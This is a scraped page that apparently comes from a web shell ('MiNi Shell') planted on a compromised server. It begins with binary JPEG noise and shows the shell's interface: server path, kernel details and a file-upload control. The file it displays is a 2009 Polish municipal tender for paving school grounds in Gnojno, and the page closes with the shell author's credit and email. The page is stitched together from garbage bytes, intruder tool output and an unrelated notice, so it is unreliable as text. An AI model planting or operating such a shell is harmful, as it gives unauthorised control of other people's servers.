JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091001/340542-N-2009.html

<p class="kh_header"><b>Gnojno: Utwardzenie terenu  przyszkolnego przy Gimnazjum w Gnojnie</b><br>
<b>Numer ogłoszenia: 340542 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gnojno , Gnojno 145, 28-114 Gnojno, woj. świętokrzyskie, tel. 0413532038, faks 0413532038.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminy.com.pl/gnojno/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utwardzenie terenu  przyszkolnego przy Gimnazjum w Gnojnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest utwardzenie terenu  przy Gimnazjum w Gnojnie na działce nr ewid. 667/1. 
W skład robót wchodzi:
- utwardzenie terenu parkingu i drogi dojazdowej należy wykonać warstwowo na gruncie rodzimym po wyprofilowaniu terenu o spadku 2%. Utwardzenie składać się będzie z warstwy odsączającej z piasku gruboziarnistego lub pospółki o współczynniku przepuszczalności minimum 0,0093 mm/s - grubość warstwy po zagęszczeniu 15 cm. Na warstwie osączającej ułożyć tłuczeń o granulacji 31,5 -63 mm warstwą (po zagęszczeniu) gr. 15 cm. Na tłuczeń kamień łamany o granulacji 0,31,5 mm warstwą (po zagęszczeniu) 8 cm. Podbudowę zaklinować klińcem i miałem kamiennym o grubości warstwy po zagęszczeniu 2 cm. Nawierzchnię wykonać z kostki betonowej wibroprasowanej gr. 8 cm na podbudowie piaskowo - cementowej o gr. średniej 5 cm po zagęszczeniu.
Utwardzenie drogi i placu wykonać po umocnieniu brzegów krawężnikami betonowymi drogowymi 15x30 cm, posadowionymi na ławie betonowej z blokiem oporowym o przekroju 30x30 cm   i podsypce piaskowej. 
- wykonanie chodnika wykonać na gruncie rodzimym  po wykorytowaniu terenu. Podbudowa składać się będzie z warstwy odsączającej z piasku gruboziarnistego lub pospółki o współczynniku przepuszczalności minimum 0,0093 mm/s - grubość warstwy po zagęszczeniu 15 cm. Na warstwie odsączającej ułożyć tłuczeń o granulacji 31,5-63mm warstwą (po zagęszczeniu) 8 cm. Podbudowę zaklinować klińcem i miałem kamiennym o grubości warstwy po zagęszczeniu 2 cm. Nawierzchnię wykonać z kostki betonowej wibroprasowanej gr. 6 cm na podbudowie piaskowo - cementowej o gr. średniej 5 cm po zagęszczeniu. 
Utwardzenie chodnika wykonać po umocnieniu brzegów obrzeżami betonowymi chodnikowymi  (ogrodowymi) 6x20 cm, posadowionymi na ławie betonowej z blokiem oporowym o przekroju 20x20 cm i podsypce pisakowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.30-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy wykonawca przystępujący do przetargu obowiązany jest wnieść wadium w wysokości 3.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy którzy:

1. Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.
2. Spełniają warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych
3. Udzielą co najmniej 3 letniej gwarancji od dnia odbioru końcowego- bezusterkowego na kompleksowe wykonanie przedmiotu zamówienia.
4. Zaakceptują warunki umowy.
5. Spełniają pozostałe warunki zawarte w SIWZ.
6. Warunki szczegółowe wymagane od wykonawców:
Wykonawcy muszą posiadać:
a) niezbędną wiedzę i doświadczenie do wykonania zamówienia tzn:
wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, oraz daty i miejsca wykonania oraz załączeniu dokumentów potwierdzających, że roboty te zostały wykonane należycie.
W celu udokumentowania spełnienia tego wymogu do oferty należy dołączyć:
wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali przynajmniej dwa zamówienia dotyczące wykonania robót budowlanych odpowiadających swoim rodzajem (tj. utwardzanie terenu, budowa parkingów) z podaniem ich wartości (tzn. powyżej 200 tys. złotych każda) - oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
b)  dysponować osobami zdolnymi do wykonania zamówienia tzn: 
wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności.
W celu udokumentowania spełnienia tego wymogu do oferty należy dołączyć:
wykaz osób przewidzianych do realizacji zamówienia w tym posiadających uprawnienia budowlane wymagane przepisami prawa budowlanego. Wykonawca  musi dysponować,  jedną osobą która będzie pełniła obowiązki kierownika budowy posiadając uprawnienia do kierowania robotami budowlanymi bez ograniczeń, w specjalności drogowej.
Do wykazu osób przewidzianych do realizacji zamówienia należy dołączyć kopie uprawnień oraz  aktualne zaświadczenie o wpisie do właściwej izby samorządu zawodowego.
pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca w wykazie osób zdolnych do wykonania zamówienia wskazał osoby którymi będzie dysponował

7.  Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:

W oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ.Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Niespełnienie chociażby jednego z ww. warunków skutkować będzie odrzuceniem oferty. Ocena spełnienia tych warunków spełnia/nie spełnia zgodnie z drukiem ZP-17.
W przypadku składania oferty przez podmioty występujące wspólnie warunki o których mowa w pkt. 6 podmioty te mogą spełnić łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w terminie składania ofert w formie określonej w niniejszej SIWZ:

a). Oświadczenie zgodnie z art. 22 ust.1 pkt 1- 4 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień  Publicznych (Dz. U. z 2007 r. Nr 223, poz.1655 z późn. zm.)- załącznik nr 3
W przypadku składania oferty przez podmioty występujące wspólnie, oświadczenie może być złożone łącznie lub może być złożone przez każdy podmiot.
b). Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot.
c). Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
W przypadku składania oferty przez podmioty występujące wspólnie, zaświadczenie  musi być złożone przez każdy podmiot.
d). Zaświadczenie właściwego oddziału ZUS lub KRUS, potwierdzające że, wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
W przypadku składania oferty przez podmioty występujące wspólnie, zaświadczenie musi być złożone przez każdy podmiot.
e). Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali przynajmniej dwa zamówienia dotyczące wykonania robót budowlanych odpowiadających swoim rodzajem  (tj. utwardzanie terenu, budowa parkingów) z podaniem ich wartości (tzn. powyżej 200 tys. złotych każda) - oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.- załącznik nr 4
f). wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu  zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - załącznik nr 5
Do wykazu należy dołączyć kopie uprawnień oraz aktualne zaświadczenie o wpisie do właściwej izby samorządu zawodowego.
g). pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. f, Wykonawca wskazał osoby, którymi będzie dysponował.
2. W przypadku zgłoszenia się do udziału w przetargu spółki cywilnej wymagane jest złożenie do oferty pełnomocnictwa wystawionego przez wszystkich wspólników lub umowy spółki z której wynika sposób reprezentacji.
3. Dokumenty, o których mowa powyżej mogą być dostarczone w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający w celach porównawczych może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów.
Kopie dokumentów muszą być czytelne i zgodne z oryginałem, tj. zawierać wszystkie treści wpisów, pieczątek, podpisy itd.., które figurują na oryginale.
W razie złożenia oferty łącznej przez kilku wykonawców oferta musi być podpisana przez wszystkich wykonawców (przez osoby uprawnione do reprezentacji) lub zgodnie z załączonym do oferty pełnomocnictwem uprawniającym do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Sposób poświadczania dokumentów: Poświadczyć dokument może tylko osoba lub osoby upoważnione do składania oświadczeń w imieniu Wykonawcy. Poświadczenie powinno nastąpić w sposób jednoznacznie identyfikujący osobę lub osoby poświadczające. Poświadczenie dokumentu musi nastąpić z użyciem formuły: za zgodność z oryginałem lub równoważnej na każdej stronie kopii.
W przypadku podpisania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osoby nie wymienione w  załączonych do oferty dokumentach (np. z odpisu z rejestru przedsiębiorców Krajowego Rejestru Sądowego, zaświadczenia o wpisie do ewidencji działalności gospodarczej) należy do oferty dołączyć stosowne pełnomocnictwo, określające zakres pełnomocnictwa. 
Pełnomocnictwa powinny być przedstawione w formie oryginału, lub poświadczonej za zgodność z oryginałem kopii przez notariusza. 
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:
1. w ust. 1 lit. b,c,d składa odpowiedni dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji właściwego organu.
Dokumenty o których mowa w ust. 4 pkt. 1 lit a   powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert. Dokument o którym mowa w ust.4 lit. b  powinien być wystawiony nie wcześniej niż 3 miesięcy przed terminem składania ofert
Jeżeli w kraju, pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust 4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminy.com.pl/gnojno/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 10:30, miejsce: Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno pokój nr  11 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com